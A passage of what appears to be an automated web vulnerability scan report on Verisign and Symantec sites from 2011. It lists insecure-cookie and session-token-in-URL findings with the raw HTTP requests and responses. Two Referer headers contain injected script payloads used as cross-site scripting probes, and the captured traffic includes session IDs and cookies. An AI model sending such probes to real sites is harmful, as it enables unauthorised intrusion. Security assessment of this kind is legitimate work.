HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 8013 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;} if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)...[SNIP]...
6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/brand.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/brand.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 7437 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css @import "vrsn.css"; #vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;} #vrsn_standard_bar_footer{border-top:1px solid #EDEDEE...[SNIP]...
6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/capture_payment.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/capture_payment.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2075 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /*import from capture_payment.css - Coakley 10_5_2010 */ .radio_button {width:180px;} .blurb {padding-left:5px;padding-bottom:10px;} #tax_exemption_section {margin-left:35px;} .content_line { position...[SNIP]...
6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/minimal_form.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/minimal_form.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 3324 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #quick_signin_box {position:relative;top:0px;margin:0px;} .minimal-form-gray, .minimal-form-gray * {background-color:gray;} .minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t...[SNIP]...
6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/module.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/module.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 698 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;} #ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po...[SNIP]...
6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/product_selector.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/product_selector.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 9496 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #comparison_chart_panel{position:absolute;right:20px;top:0;} #product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;...[SNIP]...
6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/vrsn.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/vrsn.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 30719 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0} a:link,a:visited{color:#1446A8;text-decoration:underline} h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}...[SNIP]...
6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/assets/visual-sciences/vip/zig.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/visual-sciences/vip/zig.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://idprotect.verisign.com/toolbar/activate.v Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.verisign.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:55 GMT Server: Apache Set-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT Accept-Ranges: bytes Content-Length: 2602 Expires: Sun, 09 Oct 2011 21:47:55 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-javascript //REFERENCE PAGE TAG var ct = "<img src="; var cd = "//www.verisign.com"; //this should contain the domain of the web site var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai...[SNIP]...
6.67. https://www4.symantec.com/Vrt/wl
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www4.symantec.com
Path:
/Vrt/wl
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
SYMC_TRANS_ID=69836485@@1315604068690; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Vrt/wl?tu_id=akMg1303300545922330202 HTTP/1.1 Host: www4.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315621972496-New%7C1336357972496%3B%20event69%3Devent69%7C1336357972499%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:34:28 GMT Content-type: text/html X-atg-version: ATGPlatform/2006.3p3 [ DASLicense/0 DPSLicense/0 ] Set-cookie: SYMC_TRANS_ID=69836485@@1315604068690; path=/ Location: https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 Content-Length: 97 <HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
7. Session token in URL
There are 15 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
7.1. https://idprotect.verisign.com/images/favicon.ico
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/images/favicon.ico
Issue detail
The URL in the request appears to contain a session token within the query string:
https://idprotect.verisign.com/images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Request
GET /images/favicon.ico;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:45:45 GMT Server: Apache Location: https://idprotect.verisign.com/images/favicon.ico Content-Length: 330 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://idprotect.veris...[SNIP]...
7.2. https://idprotect.verisign.com/kaptcha.jpg
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/kaptcha.jpg
Issue detail
The URL in the request appears to contain a session token within the query string:
https://idprotect.verisign.com/kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc
Request
GET /kaptcha.jpg;jsessionid=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://idprotect.verisign.com/toolbar/activate.v Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive Cookie: JSESSIONID=B046ABA8417AE521ABF2DF2A83C9408F.moped1be-d1-tc
Response
HTTP/1.0 301 Moved Permanently Date: Fri, 09 Sep 2011 21:49:00 GMT Server: Apache Location: https://idprotect.verisign.com/kaptcha.jpg Content-Length: 323 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://idprotect.veris...[SNIP]...
7.3. https://idprotect.verisign.com/scripts/global.js
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/scripts/global.js
Issue detail
The URL in the request appears to contain a session token within the query string:
https://idprotect.verisign.com/scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Request
GET /scripts/global.js;jsessionid=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1 Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:47:12 GMT Server: Apache Location: https://idprotect.verisign.com/scripts/global.js Content-Length: 329 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://idprotect.veris...[SNIP]...
7.4. https://idprotect.verisign.com/toolbar/activate.v
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The response contains the following links that appear to contain session tokens:
https://idprotect.verisign.com/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc
https://idprotect.verisign.com/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc
https://idprotect.verisign.com/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc
Request
GET /toolbar/activate.v HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:48:59 GMT Set-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure Content-Type: text/html;charset=utf-8 Content-Length: 7564 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <meta http-equiv="Expires" content="0" /><link rel="icon" href="/images/favicon.ico;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"/> <title>...[SNIP]... <link rel="stylesheet" type="text/css" media="print" href="/common/styles/print.css" /> <script type="text/javascript" src="/scripts/global.js;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc"> </script>...[SNIP]... <br/><img id="kaptchaImage" src="/kaptcha.jpg;jsessionid=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc" alt="Click for a different one!" title="Click for a different one!" /> <img id="kaptchaRefresh" src="/brand-verisign/images/ico_refresh_captcha.gif" alt="Click for a different one!" title="Click for a different one!" />...[SNIP]...
7.5. http://m.verisign.com/home.v
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://m.verisign.com
Path:
/home.v
Issue detail
The URL in the request appears to contain a session token within the query string:
http://m.verisign.com/home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2
Request
GET /home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2 HTTP/1.1 Host: m.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 22:03:49 GMT Server: Apache Location: http://vipmobile.verisign.com/home.v Content-Length: 316 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://vipmobile.verisi...[SNIP]...
7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The URL in the request appears to contain a session token within the query string:
http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
